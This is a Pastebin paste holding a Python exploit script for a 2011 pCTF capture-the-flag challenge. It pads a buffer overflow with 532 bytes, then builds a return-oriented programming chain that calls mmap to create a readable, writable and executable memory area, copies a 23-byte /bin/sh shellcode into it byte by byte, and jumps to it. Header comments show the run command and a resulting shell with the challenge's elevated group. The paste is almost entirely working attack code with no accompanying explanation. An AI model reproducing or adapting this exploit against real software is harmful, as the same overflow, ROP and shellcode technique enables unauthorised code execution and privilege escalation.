Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # file name : exploit.py
- #!/usr/bin/env python
- # pCTF 2011 - #19 Another small bug
- # ROP: mmap an rwx area, copy a shellcode and jump
- # $ { python exploit.py; cat; } |/opt/pctf/z2/exploitme 1300
- # AAAAA[...]
- # id
- # uid=2015(z2_16) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
- from struct import pack,unpack
- mmap = 0x08049ABC
- pop_4 = 0x08048973 # add esp 0x10 (16=4*4)
- pop_14 = 0x08048d01 # add esp 0x30 (48=4*12) ; pop ebx ; pop esi
- add_ecx_al = 0x08049cfd # add [ecx] al
- pop_ecx = 0x0804889f # pop ecx
- pop_eax = 0x0804859f # pop eax
- area,size = 0x13370000, 0x10000
- # /bin/sh - 23 bytes
- SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
- def copy_byte(address, byte):
- s = pack("<I", pop_ecx)
- s += pack("<I", address)
- s += pack("<I", pop_eax)
- s += pack("<I", ord(byte))
- s += pack("<I", add_ecx_al)
- return s
- p = "A"*532
- # mmap an rwx area
- p += pack("<I", mmap)
- p += pack("<I", pop_14)
- p += pack("<I", area) # void *addr
- p += pack("<I", size) # size_t length
- p += pack("<I", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
- p += pack("<I", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
- p += pack("<I", 0xffffffff) # int fd - MAP_ANONYMOUS => -1
- p += pack("<I", 0) # off_t offset
- p += pack("<I", 0)*(14-6) # unused
- # copy shellcode - and we dont want 0a :)
- for i in range(len(SC)):
- p += copy_byte(area+0xb+i, SC[i])
- # jump to it!
- p += pack("<I", area+0xb)
- print p
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement